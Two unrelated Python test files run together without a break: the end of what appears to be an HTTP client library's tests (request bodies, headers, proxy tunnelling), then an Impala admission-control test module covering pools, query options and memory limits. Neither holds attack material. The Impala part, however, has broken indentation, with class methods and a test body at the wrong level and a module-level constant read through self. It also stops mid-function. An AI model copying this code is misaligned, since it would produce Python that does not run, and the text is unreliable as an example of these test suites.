        self.assertEqual(b'body\xc1', f.read())

    def test_bytes_body(self):
        self.conn.request("PUT", "/url", b"body\xc1")
        message, f = self.get_headers_and_fp()
        self.assertEqual("text/plain", message.get_content_type())
        self.assertIsNone(message.get_charset())
        self.assertEqual("5", message.get("content-length"))
        self.assertEqual(b'body\xc1', f.read())

    def test_file_body(self):
        self.addCleanup(support.unlink, support.TESTFN)
        with open(support.TESTFN, "w") as f:
            f.write("body")
        with open(support.TESTFN) as f:
            self.conn.request("PUT", "/url", f)
        message, f = self.get_headers_and_fp()
        self.assertEqual("text/plain", message.get_content_type())
        self.assertIsNone(message.get_charset())
        self.assertEqual("4", message.get("content-length"))
        self.assertEqual(b'body', f.read())

    def test_binary_file_body(self):
        self.addCleanup(support.unlink, support.TESTFN)
        with open(support.TESTFN, "wb") as f:
            f.write(b"body\xc1")
        with open(support.TESTFN, "rb") as f:
            self.conn.request("PUT", "/url", f)
        message, f = self.get_headers_and_fp()
        self.assertEqual("text/plain", message.get_content_type())
        self.assertIsNone(message.get_charset())
        self.assertEqual("5", message.get("content-length"))
        self.assertEqual(b'body\xc1', f.read())
class HTTPResponseTest(TestCase):
    """getheader() behaviour: duplicated headers and default values."""

    def setUp(self):
        # Response with the same header given twice: getheader() must join
        # the values with ", ".  (The backslash is a source-line
        # continuation inside the string literal.)
        body = "HTTP/1.1 200 Ok\r\nMy-Header: first-value\r\nMy-Header: \
second-value\r\n\r\nText"
        sock = FakeSocket(body)
        self.resp = client.HTTPResponse(sock)
        self.resp.begin()

    def test_getting_header(self):
        header = self.resp.getheader('My-Header')
        self.assertEqual(header, 'first-value, second-value')

        # The default is ignored when the header is present.
        header = self.resp.getheader('My-Header', 'some default')
        self.assertEqual(header, 'first-value, second-value')

    def test_getting_nonexistent_header_with_string_default(self):
        header = self.resp.getheader('No-Such-Header', 'default-value')
        self.assertEqual(header, 'default-value')

    def test_getting_nonexistent_header_with_iterable_default(self):
        # Iterable defaults are joined the same way duplicated headers are.
        header = self.resp.getheader('No-Such-Header', ['default', 'values'])
        self.assertEqual(header, 'default, values')

        header = self.resp.getheader('No-Such-Header', ('default', 'values'))
        self.assertEqual(header, 'default, values')

    def test_getting_nonexistent_header_without_default(self):
        header = self.resp.getheader('No-Such-Header')
        self.assertEqual(header, None)

    def test_getting_header_defaultint(self):
        # Non-string, non-iterable defaults are returned unchanged.
        header = self.resp.getheader('No-Such-Header', default=42)
        self.assertEqual(header, 42)
class TunnelTests(TestCase):
    """CONNECT-tunnelling behaviour of HTTPConnection via a fake proxy."""

    def setUp(self):
        # Canned proxy conversation: CONNECT succeeds, then the tunnelled
        # HEAD request receives an ordinary response.
        response_text = (
            'HTTP/1.0 200 OK\r\n\r\n'  # Reply to CONNECT
            'HTTP/1.1 200 OK\r\n'  # Reply to HEAD
            'Content-Length: 42\r\n\r\n'
        )
        self.host = 'proxy.com'
        self.conn = client.HTTPConnection(self.host)
        self.conn._create_connection = self._create_connection(response_text)

    def tearDown(self):
        self.conn.close()

    def _create_connection(self, response_text):
        # Factory producing a stand-in for socket.create_connection that
        # records the (host, port) the connection was asked to reach.
        def create_connection(address, timeout=None, source_address=None):
            return FakeSocket(response_text, host=address[0], port=address[1])
        return create_connection

    def test_set_tunnel_host_port_headers(self):
        tunnel_host = 'destination.com'
        tunnel_port = 8888
        tunnel_headers = {'User-Agent': 'Mozilla/5.0 (compatible, MSIE 11)'}
        self.conn.set_tunnel(tunnel_host, port=tunnel_port,
                             headers=tunnel_headers)
        self.conn.request('HEAD', '/', '')
        # The TCP connection is to the proxy, not to the tunnelled host.
        self.assertEqual(self.conn.sock.host, self.host)
        self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
        self.assertEqual(self.conn._tunnel_host, tunnel_host)
        self.assertEqual(self.conn._tunnel_port, tunnel_port)
        self.assertEqual(self.conn._tunnel_headers, tunnel_headers)

    def test_disallow_set_tunnel_after_connect(self):
        # Once connected, we shouldn't be able to tunnel anymore
        self.conn.connect()
        self.assertRaises(RuntimeError, self.conn.set_tunnel,
                          'destination.com')

    def test_connect_with_tunnel(self):
        self.conn.set_tunnel('destination.com')
        self.conn.request('HEAD', '/', '')
        self.assertEqual(self.conn.sock.host, self.host)
        self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
        self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
        # issue22095
        self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
        self.assertIn(b'Host: destination.com', self.conn.sock.data)

        # This test should be removed when CONNECT gets the HTTP/1.1 blessing
        self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)

    def test_connect_put_request(self):
        self.conn.set_tunnel('destination.com')
        self.conn.request('PUT', '/', '')
        self.assertEqual(self.conn.sock.host, self.host)
        self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
        self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
        self.assertIn(b'Host: destination.com', self.conn.sock.data)

    def test_tunnel_debuglog(self):
        expected_header = 'X-Dummy: 1'
        response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)

        self.conn.set_debuglevel(1)
        self.conn._create_connection = self._create_connection(response_text)
        self.conn.set_tunnel('destination.com')

        # With debuglevel=1 each response header is echoed to stdout.
        with support.captured_stdout() as output:
            self.conn.request('PUT', '/', '')
        lines = output.getvalue().splitlines()
        self.assertIn('header: {}'.format(expected_header), lines)
@support.reap_threads
def test_main(verbose=None):
    """Run all the TestCases in this module under regrtest's runner."""
    cases = (HeaderTests, OfflineTest, HttpMethodTests,
             BasicTest, TimeoutTest, PersistenceTest,
             HTTPSTest, RequestBodyTest, SourceAddressTest,
             HTTPResponseTest, ExtendedReadTest,
             ExtendedReadTestChunked, TunnelTests)
    support.run_unittest(*cases)
# Allow running this test file directly (outside of regrtest).
if __name__ == '__main__':
    test_main()
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Tests admission control
import itertools
import logging
import os
import pytest
import re
import shutil
import sys
import threading
from copy import copy
from time import sleep, time
from beeswaxd.BeeswaxService import QueryState
from tests.beeswax.impala_beeswax import ImpalaBeeswaxException
from tests.common.custom_cluster_test_suite import CustomClusterTestSuite
from tests.common.environ import build_flavor_timeout, ImpalaTestClusterProperties
from tests.common.impala_test_suite import ImpalaTestSuite
from tests.common.resource_pool_config import ResourcePoolConfig
from tests.common.skip import (
SkipIfS3,
SkipIfGCS,
SkipIfCOS,
SkipIfABFS,
SkipIfADLS,
SkipIfEC,
SkipIfNotHdfsMinicluster,
SkipIfOS)
from tests.common.test_dimensions import (
create_single_exec_option_dimension,
create_uncompressed_text_dimension)
from tests.common.test_vector import ImpalaTestDimension
from tests.hs2.hs2_test_suite import HS2TestSuite, needs_session
from tests.util.web_pages_util import (
get_num_completed_backends,
get_mem_admitted_backends_debug_page)
from tests.verifiers.mem_usage_verifier import MemUsageVerifier
from tests.verifiers.metric_verifier import MetricVerifier
from ImpalaService import ImpalaHiveServer2Service
from TCLIService import TCLIService
LOG = logging.getLogger('admission_test')

# The query used for testing. It is important that this query returns many rows
# while keeping fragments active on all backends. This allows a thread to keep
# the query active and consuming resources by fetching one row at a time. The
# where clause is for debugging purposes; each thread will insert its id so
# that running queries can be correlated with the thread that submitted them.
QUERY = " union all ".join(["select * from functional.alltypesagg where id != {0}"] * 30)

# Same query but with additional unpartitioned non-coordinator fragments.
# The unpartitioned fragments are both interior fragments that consume input
# from a scan fragment and non-interior fragments with a constant UNION.
QUERY_WITH_UNPARTITIONED_FRAGMENTS = """
select *, (select count(distinct int_col) from alltypestiny) subquery1,
(select count(distinct int_col) from alltypes) subquery2,
(select 1234) subquery3
from (""" + QUERY + """) v"""

# The statestore heartbeat and topic update frequency (ms). Set low for testing.
STATESTORE_RPC_FREQUENCY_MS = 100

# Time to sleep (in milliseconds) between issuing queries. When the delay is at least
# the statestore heartbeat frequency, all state should be visible by every impalad by
# the time the next query is submitted. Otherwise the different impalads will see stale
# state for some admission decisions.
SUBMISSION_DELAY_MS = \
    [0, STATESTORE_RPC_FREQUENCY_MS / 2, STATESTORE_RPC_FREQUENCY_MS * 3 / 2]

# Whether we will submit queries to all available impalads (in a round-robin fashion)
ROUND_ROBIN_SUBMISSION = [True, False]

# The query pool to use. The impalads should be configured to recognize this
# pool with the parameters below.
POOL_NAME = "default-pool"

# Stress test timeout (seconds). The timeout needs to be significantly higher for
# slow builds like code coverage and ASAN (IMPALA-3790, IMPALA-6241).
STRESS_TIMEOUT = build_flavor_timeout(90, slow_build_timeout=600)

# The number of queries that can execute concurrently in the pool POOL_NAME.
MAX_NUM_CONCURRENT_QUERIES = 5

# The number of queries that can be queued in the pool POOL_NAME
MAX_NUM_QUEUED_QUERIES = 10

# Mem limit (bytes) used in the mem limit test, i.e. 12GB.
MEM_TEST_LIMIT = 12 * 1024 * 1024 * 1024

# Arguments passed to the statestore to speed up heartbeats/topic updates in tests.
_STATESTORED_ARGS = ("-statestore_heartbeat_frequency_ms={freq_ms} "
                     "-statestore_priority_update_frequency_ms={freq_ms}").format(
                         freq_ms=STATESTORE_RPC_FREQUENCY_MS)

# Name of the subscriber metric tracking the admission control update interval.
REQUEST_QUEUE_UPDATE_INTERVAL =\
    'statestore-subscriber.topic-impala-request-queue.update-interval'

# Key in the query profile for the query options.
PROFILE_QUERY_OPTIONS_KEY = "Query Options (set by configuration): "

# The different ways that a query thread can end its query.
QUERY_END_BEHAVIORS = ['EOS', 'CLIENT_CANCEL', 'QUERY_TIMEOUT', 'CLIENT_CLOSE']

# The timeout used for the QUERY_TIMEOUT end behaviour
QUERY_END_TIMEOUT_S = 3

# Value used for --admission_control_stale_topic_threshold_ms in tests.
STALE_TOPIC_THRESHOLD_MS = 500

# Regex that matches the first part of the profile info string added when a query is
# queued.
INITIAL_QUEUE_REASON_REGEX = \
    "Initial admission queue reason: waited [0-9]* ms, reason: .*"

# The path to resources directory which contains the admission control config files.
RESOURCES_DIR = os.path.join(os.environ['IMPALA_HOME'], "fe", "src", "test", "resources")
def impalad_admission_ctrl_flags(max_requests, max_queued, pool_max_mem,
                                 proc_mem_limit=None, queue_wait_timeout_ms=None,
                                 admission_control_slots=None, executor_groups=None):
  """Builds the impalad flag string that configures default-pool admission
  control limits. Optional keyword arguments append the corresponding flag
  only when a value is supplied."""
  optional_flags = [
      ("-mem_limit={0}", proc_mem_limit),
      ("-queue_wait_timeout_ms={0}", queue_wait_timeout_ms),
      ("-admission_control_slots={0}", admission_control_slots),
      ("-executor_groups={0}", executor_groups),
  ]
  extra_flags = "".join(" " + template.format(value)
                        for template, value in optional_flags if value is not None)
  return ("-vmodule admission-controller=3 -default_pool_max_requests {0} "
          "-default_pool_max_queued {1} -default_pool_mem_limit {2} {3}".format(
            max_requests, max_queued, pool_max_mem, extra_flags))
def impalad_admission_ctrl_config_args(fs_allocation_file, llama_site_file,
                                       additional_args="", make_copy=False):
  """Builds impalad args pointing admission control at the given fair-scheduler
  and llama-site config files from RESOURCES_DIR. With make_copy=True the
  files are first duplicated (prefix "copy-") so a test may modify them
  without touching the checked-in originals."""
  resolved = []
  for fname in (fs_allocation_file, llama_site_file):
    path = os.path.join(RESOURCES_DIR, fname)
    if make_copy:
      copy_path = os.path.join(RESOURCES_DIR, "copy-" + fname)
      shutil.copy2(path, copy_path)
      path = copy_path
    resolved.append(path)
  return ("-vmodule admission-controller=3 -fair_scheduler_allocation_path %s "
          "-llama_site_path %s %s" % (resolved[0], resolved[1], additional_args))
def log_metrics(log_prefix, metrics):
  """Logs the admission-controller counters from 'metrics' at INFO level,
  prefixed with 'log_prefix'."""
  counter_names = ('admitted', 'queued', 'dequeued', 'rejected', 'released',
                   'timed-out')
  LOG.info("%sadmitted=%s, queued=%s, dequeued=%s, rejected=%s, "
           "released=%s, timed-out=%s", log_prefix,
           *(metrics[name] for name in counter_names))
def compute_metric_deltas(m2, m1):
  """Returns a dictionary of the differences of metrics in m2 and m1 (m2 - m1).
  Metrics missing from m1 are treated as 0."""
  return {name: m2.get(name, 0) - m1.get(name, 0) for name in m2}
def metric_key(pool_name, metric_name):
  """Helper method to construct the admission controller metric keys.
  Note the metric name precedes the pool name in the key."""
  return "admission-controller.{0}.{1}".format(metric_name, pool_name)
class TestAdmissionControllerBase(CustomClusterTestSuite):
  """Shared workload/test-matrix configuration for the admission tests."""

  @classmethod
  def get_workload(cls):
    # Fixed: the first parameter of a @classmethod is conventionally 'cls',
    # not 'self' (it receives the class, not an instance).
    return 'functional-query'

  @classmethod
  def add_test_dimensions(cls):
    super(TestAdmissionControllerBase, cls).add_test_dimensions()
    cls.ImpalaTestMatrix.add_dimension(create_single_exec_option_dimension())
    # There's no reason to test this on other file formats/compression codecs right now
    cls.ImpalaTestMatrix.add_dimension(
        create_uncompressed_text_dimension(cls.get_workload()))
class TestAdmissionController(TestAdmissionControllerBase, HS2TestSuite):
def __check_pool_rejected(self, client, pool, expected_error_re):
    """Submits a trivial query to 'pool' and asserts that it is rejected with
    an error matching 'expected_error_re'."""
    try:
        client.set_configuration({'request_pool': pool})
        client.execute("select 1")
    except ImpalaBeeswaxException as e:
        assert re.search(expected_error_re, str(e))
    else:
        # Reaching here means the query unexpectedly succeeded.
        assert False, "Query should return error"
def __check_query_options(self, profile, expected_query_options):
    """Validate that the expected per-pool query options were set on the specified
    profile. expected_query_options is a list of "KEY=VALUE" strings, e.g.
    ["MEM_LIMIT=1", ...]"""
    configured = []
    for line in profile.split("\n"):
        if PROFILE_QUERY_OPTIONS_KEY not in line:
            continue
        # Everything after the first ": " is the comma-separated option list.
        configured = re.split(",", re.split(": ", line)[1])
        break
    expected_set = set(option.lower() for option in expected_query_options)
    actual_set = set(option.lower() for option in configured)
    assert expected_set <= actual_set
def __check_hs2_query_opts(self, pool_name, mem_limit=None, spool_query_results=None,
                           expected_options=None):
  """ Submits a query via HS2 (optionally with a mem_limit in the confOverlay)
  into pool_name and checks that the expected_query_options are set in the
  profile."""
  execute_statement_req = TCLIService.TExecuteStatementReq()
  execute_statement_req.sessionHandle = self.session_handle
  # Route the query to the requested pool via the session conf overlay.
  execute_statement_req.confOverlay = {'request_pool': pool_name}
  if mem_limit is not None: execute_statement_req.confOverlay['mem_limit'] = mem_limit
  if spool_query_results is not None:
    execute_statement_req.confOverlay['spool_query_results'] = spool_query_results
  execute_statement_req.statement = "select 1"
  execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
  HS2TestSuite.check_response(execute_statement_resp)

  # Fetch one row so the query runs to completion before it is closed.
  fetch_results_req = TCLIService.TFetchResultsReq()
  fetch_results_req.operationHandle = execute_statement_resp.operationHandle
  fetch_results_req.maxRows = 1
  fetch_results_resp = self.hs2_client.FetchResults(fetch_results_req)
  HS2TestSuite.check_response(fetch_results_resp)

  close_operation_req = TCLIService.TCloseOperationReq()
  close_operation_req.operationHandle = execute_statement_resp.operationHandle
  HS2TestSuite.check_response(self.hs2_client.CloseOperation(close_operation_req))

  # Retrieve the runtime profile and verify the per-pool options were applied.
  get_profile_req = ImpalaHiveServer2Service.TGetRuntimeProfileReq()
  get_profile_req.operationHandle = execute_statement_resp.operationHandle
  get_profile_req.sessionHandle = self.session_handle
  get_profile_resp = self.hs2_client.GetRuntimeProfile(get_profile_req)
  HS2TestSuite.check_response(get_profile_resp)
  self.__check_query_options(get_profile_resp.profile, expected_options)
def _execute_and_collect_profiles(self, queries, timeout_s, config_options={},
                                  allow_query_failure=False):
  """Submit the query statements in 'queries' in parallel to the first impalad in
  the cluster. After submission, the results are fetched from the queries in
  sequence and their profiles are collected. Wait for up to timeout_s for
  each query to finish. If 'allow_query_failure' is True, succeeds if the query
  completes successfully or ends up in the EXCEPTION state. Otherwise expects the
  queries to complete successfully.
  Returns the profile strings."""
  client = self.cluster.impalads[0].service.create_beeswax_client()
  expected_states = [client.QUERY_STATES['FINISHED']]
  if allow_query_failure:
    expected_states.append(client.QUERY_STATES['EXCEPTION'])
  try:
    handles = []
    profiles = []
    client.set_configuration(config_options)
    # Submit everything first so the queries run concurrently.
    for query in queries:
      handles.append(client.execute_async(query))
    for query, handle in zip(queries, handles):
      state = self.wait_for_any_state(handle, expected_states, timeout_s)
      if state == client.QUERY_STATES['FINISHED']:
        # NOTE(review): the queries were submitted on the locally created
        # 'client', but fetch/profile go through self.client -- presumably
        # handles are valid across clients here; confirm this is intentional.
        self.client.fetch(query, handle)
      profiles.append(self.client.get_runtime_profile(handle))
    return profiles
  finally:
    client.close()
def get_ac_process(self):
    """Returns the Process that is running the admission control service.
    For this suite that is the first impalad in the minicluster."""
    return self.cluster.impalads[0]
def get_ac_log_name(self):
    """Returns the prefix of the log files for the admission control process.
    Matches get_ac_process(), which returns an impalad for this suite."""
    return "impalad"
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="fair-scheduler-test2.xml",
        llama_site_file="llama-site-test2.xml"),
      default_query_options=[('mem_limit', 200000000)],
      statestored_args=_STATESTORED_ARGS)
  @needs_session(conf_overlay={'batch_size': '100'})
  def test_set_request_pool(self):
    """Tests setting the REQUEST_POOL with the pool placement policy configured
    to require a specific pool, and validate that the per-pool configurations were
    applied.

    Covers: rejection of empty/unknown/unauthorized pools, inheritance of
    process-wide default query options (mem_limit=200000000 set via the
    decorator above), per-pool option defaults, and option overrides via SET
    statements and via config overlays, for both beeswax and HS2 clients."""
    impalad = self.cluster.impalads[0]
    client = impalad.service.create_beeswax_client()
    # Expected default mem limit for queueA, used in several tests below
    queueA_mem_limit = "MEM_LIMIT=%s" % (128 * 1024 * 1024)
    try:
      # Empty and unknown pool names should fail pool mapping.
      for pool in ['', 'not_a_pool_name']:
        expected_error =\
            "No mapping found for request from user '\S+' with requested pool '%s'"\
            % (pool)
        self.__check_pool_rejected(client, pool, expected_error)
      # Check rejected if user does not have access.
      expected_error = "Request from user '\S+' with requested pool 'root.queueC' "\
          "denied access to assigned pool 'root.queueC'"
      self.__check_pool_rejected(client, 'root.queueC', expected_error)
      # Also try setting a valid pool
      client.set_configuration({'request_pool': 'root.queueB'})
      result = client.execute("select 1")
      # Query should execute in queueB which doesn't have a default mem limit set in the
      # llama-site.xml, so it should inherit the value from the default process query
      # options.
      self.__check_query_options(result.runtime_profile,
          ['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB'])
      # Try setting the pool for a queue with a very low queue timeout.
      # queueA allows only 1 running query and has a queue timeout of 50ms, so the
      # second concurrent query should time out quickly.
      client.set_configuration({'request_pool': 'root.queueA'})
      handle = client.execute_async("select sleep(1000)")
      # Wait for query to clear admission control and get accounted for
      client.wait_for_admission_control(handle)
      self.__check_pool_rejected(client, 'root.queueA', "exceeded timeout")
      assert client.get_state(handle) == client.QUERY_STATES['FINISHED']
      # queueA has default query options mem_limit=128m,query_timeout_s=5
      self.__check_query_options(client.get_runtime_profile(handle),
          [queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA'])
      client.close_query(handle)
      # IMPALA-9856: We disable query result spooling so that this test can run queries
      # with low mem_limit.
      client.execute("set spool_query_results=0")
      # Should be able to set query options via the set command (overriding defaults if
      # applicable). mem_limit overrides the pool default. abort_on_error has no
      # proc/pool default.
      client.execute("set mem_limit=31337")
      client.execute("set abort_on_error=1")
      result = client.execute("select 1")
      self.__check_query_options(result.runtime_profile,
          ['MEM_LIMIT=31337', 'ABORT_ON_ERROR=1', 'QUERY_TIMEOUT_S=5',
           'REQUEST_POOL=root.queueA'])
      # Should be able to set query options (overriding defaults if applicable) with the
      # config overlay sent with the query RPC. mem_limit is a pool-level override and
      # max_io_buffers has no proc/pool default.
      client.set_configuration({'request_pool': 'root.queueA', 'mem_limit': '12345'})
      result = client.execute("select 1")
      self.__check_query_options(result.runtime_profile,
          ['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA',
           'ABORT_ON_ERROR=1'])
      # Once options are reset to their defaults, the queue
      # configuration should kick back in. We'll see the
      # queue-configured mem_limit, and we won't see
      # abort on error, because it's back to being the default.
      client.execute('set mem_limit=""')
      client.execute('set abort_on_error=""')
      client.set_configuration({'request_pool': 'root.queueA'})
      result = client.execute("select 1")
      self.__check_query_options(result.runtime_profile,
          [queueA_mem_limit, 'REQUEST_POOL=root.queueA', 'QUERY_TIMEOUT_S=5'])
    finally:
      client.close()

    # HS2 tests:
    # batch_size is set in the HS2 OpenSession() call via the requires_session() test
    # decorator, so that is included in all test cases below.
    batch_size = "BATCH_SIZE=100"

    # Check HS2 query in queueA gets the correct query options for the pool.
    self.__check_hs2_query_opts("root.queueA", None, 'false',
        [queueA_mem_limit, 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
    # Check overriding the mem limit sent in the confOverlay with the query.
    self.__check_hs2_query_opts("root.queueA", '12345', 'false',
        ['MEM_LIMIT=12345', 'QUERY_TIMEOUT_S=5', 'REQUEST_POOL=root.queueA', batch_size])
    # Check HS2 query in queueB gets the process-wide default query options
    self.__check_hs2_query_opts("root.queueB", None, 'false',
        ['MEM_LIMIT=200000000', 'REQUEST_POOL=root.queueB', batch_size])
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="fair-scheduler-test2.xml",
        llama_site_file="llama-site-test2.xml",
        additional_args="-require_username -anonymous_user_name="),
      statestored_args=_STATESTORED_ARGS)
  def test_require_user(self):
    """Tests that with -require_username set (and the anonymous user name
    disabled), a query submitted over HS2 from a session with an empty username
    fails with a 'User must be specified' error rather than executing."""
    open_session_req = TCLIService.TOpenSessionReq()
    # Deliberately open the session with an empty username.
    open_session_req.username = ""
    open_session_resp = self.hs2_client.OpenSession(open_session_req)
    TestAdmissionController.check_response(open_session_resp)

    try:
      execute_statement_req = TCLIService.TExecuteStatementReq()
      execute_statement_req.sessionHandle = open_session_resp.sessionHandle
      execute_statement_req.statement = "select count(1) from functional.alltypes"
      execute_statement_resp = self.hs2_client.ExecuteStatement(execute_statement_req)
      # The statement should transition to the ERROR state, not complete.
      self.wait_for_operation_state(execute_statement_resp.operationHandle,
                                    TCLIService.TOperationState.ERROR_STATE)
      get_operation_status_resp = self.get_operation_status(
          execute_statement_resp.operationHandle)
      assert "User must be specified" in get_operation_status_resp.errorMessage
    finally:
      # Always close the HS2 session, even if the assertions above fail.
      close_req = TCLIService.TCloseSessionReq()
      close_req.sessionHandle = open_session_resp.sessionHandle
      TestAdmissionController.check_response(self.hs2_client.CloseSession(close_req))
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
        pool_max_mem=10 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
      statestored_args=_STATESTORED_ARGS)
  def test_trivial_coord_query_limits(self):
    """Tests that trivial coordinator only queries have negligible resource requirements.

    The pool max mem is only 10MB, so trivial queries (constant exprs, limit 0)
    must be admitted while any query that actually scans data is rejected."""
    if self.exploration_strategy() != 'exhaustive':
      pytest.skip('runs only in exhaustive')
    # Queries with only constant exprs or limit 0 should be admitted.
    self.execute_query_expect_success(self.client, "select 1")
    self.execute_query_expect_success(self.client,
        "select * from functional.alltypes limit 0")

    # Queries that scan any rows need more memory than the 10MB pool allows.
    non_trivial_queries = [
        "select * from functional.alltypesagg limit 1",
        "select * from functional.alltypestiny"]
    for query in non_trivial_queries:
      ex = self.execute_query_expect_failure(self.client, query)
      assert re.search("Rejected query from pool default-pool: request memory needed "
                       ".* is greater than pool max mem resources 10.00 MB", str(ex))
  # Skipped on filesystems whose synthetic block sizes change scanner memory
  # estimates, which this test depends on.
  @SkipIfS3.hdfs_block_size
  @SkipIfGCS.hdfs_block_size
  @SkipIfCOS.hdfs_block_size
  @SkipIfABFS.hdfs_block_size
  @SkipIfADLS.hdfs_block_size
  @SkipIfEC.fix_later
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
        pool_max_mem=40 * 1024 * 1024, proc_mem_limit=1024 * 1024 * 1024),
      statestored_args=_STATESTORED_ARGS)
  def test_memory_rejection(self, vector):
    """Test that rejection of queries based on reservation and estimates works as
    expected. The test depends on scanner memory estimates, which different on remote
    filesystems with different (synthetic) block sizes."""
    # Test that the query will be rejected by admission control if:
    # a) the largest per-backend min buffer reservation is larger than the query mem limit
    # b) the largest per-backend min buffer reservation is larger than the
    #    buffer_pool_limit query option
    # c) the cluster-wide min-buffer reservation size is larger than the pool memory
    #    resources.
    self.run_test_case('QueryTest/admission-reject-min-reservation', vector)

    # Test that queries are rejected based on memory estimates. Set num_nodes=1 to
    # avoid unpredictability from scheduling on different backends.
    exec_options = vector.get_value('exec_option')
    exec_options['num_nodes'] = 1
    self.run_test_case('QueryTest/admission-reject-mem-estimate', vector)
# Process mem_limit used in test_mem_limit_upper_bound
PROC_MEM_TEST_LIMIT = 1024 * 1024 * 1024
@pytest.mark.execute_serially
@CustomClusterTestSuite.with_args(
impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT))
def test_mem_limit_upper_bound(self, vector):
""" Test to ensure that a query is admitted if the requested memory is equal to the
process mem limit"""
query = "select * from functional.alltypesagg limit 1"
exec_options = vector.get_value('exec_option')
# Setting requested memory equal to process memory limit
exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
self.execute_query_expect_success(self.client, query, exec_options)
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_flags(max_requests=1, max_queued=1,
        pool_max_mem=10 * PROC_MEM_TEST_LIMIT, proc_mem_limit=PROC_MEM_TEST_LIMIT),
      num_exclusive_coordinators=1)
  def test_mem_limit_dedicated_coordinator(self, vector):
    """Regression test for IMPALA-8469: coordinator fragment should be admitted on
    dedicated coordinator"""
    query = "select * from functional.alltypesagg limit 1"
    exec_options = vector.get_value('exec_option')
    # Test both single-node and distributed plans
    for num_nodes in [0, 1]:
      # Memory just fits in memory limits
      exec_options['mem_limit'] = self.PROC_MEM_TEST_LIMIT
      exec_options['num_nodes'] = num_nodes
      self.execute_query_expect_success(self.client, query, exec_options)

      # A bit too much memory to run on coordinator.
      # NOTE: 'long' is Python-2-only; this file predates a py3 migration.
      exec_options['mem_limit'] = long(self.PROC_MEM_TEST_LIMIT * 1.1)
      ex = self.execute_query_expect_failure(self.client, query, exec_options)
      # 1.10 GB requested vs the 1.00 GB proc_mem_limit configured above.
      assert ("Rejected query from pool default-pool: request memory needed "
              "1.10 GB is greater than memory available for admission 1.00 GB" in
              str(ex)), str(ex)
  @SkipIfNotHdfsMinicluster.tuned_for_minicluster
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="mem-limit-test-fair-scheduler.xml",
        llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
      cluster_size=2)
  def test_dedicated_coordinator_mem_accounting(self, vector):
    """Verify that when using dedicated coordinators, the memory admitted for and the
    mem limit applied to the query fragments running on the coordinator is different than
    the ones on executors.

    Thin wrapper: the actual checks live in __verify_mem_accounting."""
    self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=True)
  @SkipIfNotHdfsMinicluster.tuned_for_minicluster
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="mem-limit-test-fair-scheduler.xml",
        llama_site_file="mem-limit-test-llama-site.xml")
      + " -use_dedicated_coordinator_estimates false",
      num_exclusive_coordinators=1,
      cluster_size=2)
  def test_dedicated_coordinator_legacy_mem_accounting(self, vector):
    """Verify that when using dedicated coordinators with specialized dedicated coord
    estimates turned off using a hidden startup param, the memory admitted for and the
    mem limit applied to the query fragments running on the coordinator is the same
    (as expected from legacy behavior).

    Thin wrapper: the actual checks live in __verify_mem_accounting."""
    self.__verify_mem_accounting(vector, using_dedicated_coord_estimates=False)
  @SkipIfNotHdfsMinicluster.tuned_for_minicluster
  @pytest.mark.execute_serially
  @CustomClusterTestSuite.with_args(
      impalad_args=impalad_admission_ctrl_config_args(
        fs_allocation_file="mem-limit-test-fair-scheduler.xml",
        llama_site_file="mem-limit-test-llama-site.xml"), num_exclusive_coordinators=1,
      cluster_size=2)
  def test_sanity_checks_dedicated_coordinator(self, vector, unique_database):
    """Sanity tests for verifying targeted dedicated coordinator memory estimations and
    behavior.

    Checks (a) MAX_MEM_ESTIMATE_FOR_ADMISSION caps the coordinator estimate,
    (b) a coordinator-only plan (NUM_NODES=1) admits zero executor memory, and
    (c) runtime-filter aggregation at the coordinator works when no fragments
    are scheduled there."""
    self.client.set_configuration_option('request_pool', "root.regularPool")
    ImpalaTestSuite.change_database(self.client, vector.get_value('table_format'))
    exec_options = vector.get_value('exec_option')
    # Make sure query option MAX_MEM_ESTIMATE_FOR_ADMISSION is enforced on the dedicated
    # coord estimates. Without this query option the estimate would be > 100MB.
    expected_mem = 60 * (1 << 20)  # 60MB
